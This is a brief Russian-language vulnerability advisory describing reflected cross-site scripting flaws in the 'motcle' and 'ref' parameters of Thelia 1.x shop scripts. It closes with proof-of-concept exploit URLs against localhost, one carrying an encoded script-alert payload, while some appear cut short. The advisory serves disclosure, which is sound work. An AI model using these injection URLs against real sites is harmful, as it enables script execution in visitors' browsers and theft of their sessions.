Программа: Thelia 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "motcle" сценарием recherche.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "ref" сценариями panier.php и produit.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

http://localhost/panier.php?action=ajouter&ref=[XSS]
http://localhost/panier.php?action=ajouter&ref=">

http://localhost/produit.php?ref=[XSS]
http://localhost/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1

http://localhost/rss.php?ref=[XSS]
http://localhost/rss.php?ref=">&id_rubrique=



Оставить мнение